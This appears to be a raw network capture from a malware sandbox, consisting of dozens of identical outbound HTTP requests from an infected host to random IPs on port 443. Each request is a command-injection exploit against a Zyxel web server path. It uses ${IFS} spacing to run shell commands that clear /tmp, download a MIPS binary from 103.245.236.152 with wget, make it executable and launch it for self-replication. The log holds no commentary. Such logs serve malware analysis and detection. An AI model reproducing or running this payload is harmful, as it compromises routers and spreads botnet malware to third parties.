                                        Jan 14, 2024 16:18:43.422907114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3974192.168.2.1344312106.0.62.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422941923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3975192.168.2.13588221.141.113.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422974110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3976192.168.2.1359584171.230.132.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423007011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3977192.168.2.1342402176.252.212.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423062086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3978192.168.2.1334440113.230.105.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423088074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3979192.168.2.134508075.114.74.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423141956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3980192.168.2.1347414170.95.46.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423178911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3981192.168.2.136060658.56.95.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423229933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3982192.168.2.1347830120.127.104.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423254967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3983192.168.2.134882451.144.240.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423305035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3984192.168.2.134878240.218.8.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423332930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3985192.168.2.1337320222.115.112.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423367023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3986192.168.2.1333040164.128.198.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423378944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3987192.168.2.1359626208.61.113.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423451900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3988192.168.2.1357716157.86.247.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423485994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3989192.168.2.134136279.62.202.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423535109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3990192.168.2.1353566118.218.81.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423569918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3991192.168.2.134423477.115.194.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423624039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3992192.168.2.1343354201.39.72.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423655987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3993192.168.2.133718871.43.139.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423705101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3994192.168.2.134236631.40.8.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423731089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3995192.168.2.1336826103.90.154.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423778057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3996192.168.2.133285039.151.175.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423798084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3997192.168.2.133277676.4.203.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423860073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3998192.168.2.1354692134.132.109.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423911095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3999192.168.2.135133638.194.70.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.423952103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4000192.168.2.1356068108.221.225.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424002886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4001192.168.2.1356484223.247.194.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424036026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4002192.168.2.135236213.81.37.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424074888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4003192.168.2.1359566192.252.1.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424129963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4004192.168.2.136034261.97.29.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424159050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4005192.168.2.1341664120.204.51.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424204111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4006192.168.2.133446240.192.132.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424235106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4007192.168.2.135180893.83.106.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424272060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4008192.168.2.135346265.194.5.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424326897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4009192.168.2.13416329.255.225.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424370050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4010192.168.2.1345930140.68.138.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424400091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4011192.168.2.1354442197.227.184.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424432993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4012192.168.2.1360014178.133.42.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424490929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4013192.168.2.133730436.44.39.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424535036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4014192.168.2.134967295.203.202.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424571991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4015192.168.2.134515641.203.124.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424612045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4016192.168.2.135750499.83.1.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424655914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4017192.168.2.133515889.14.166.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424685955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4018192.168.2.1349118136.98.60.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424705982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4019192.168.2.133755831.72.62.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424743891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4020192.168.2.134735247.60.11.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424778938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4021192.168.2.134778867.119.5.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424807072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4022192.168.2.1334152174.206.59.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424843073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4023192.168.2.135282854.253.45.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424873114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4024192.168.2.135339423.61.34.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424951077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4025192.168.2.1335052154.230.138.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.424994946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4026192.168.2.135755865.73.83.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425045013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4027192.168.2.1333856101.231.200.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425071955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4028192.168.2.134838841.144.19.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425128937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4029192.168.2.135773647.104.26.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425162077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4030192.168.2.134923627.13.30.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425209045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4031192.168.2.134252268.30.243.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425260067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4032192.168.2.13357241.23.47.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425302029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4033192.168.2.1335298202.81.117.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425333977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4034192.168.2.135995691.54.238.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425368071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4035192.168.2.1344300101.244.38.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.425410032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4036192.168.2.134872662.124.53.17443
                                        TimestampBytes transferredDirectionData
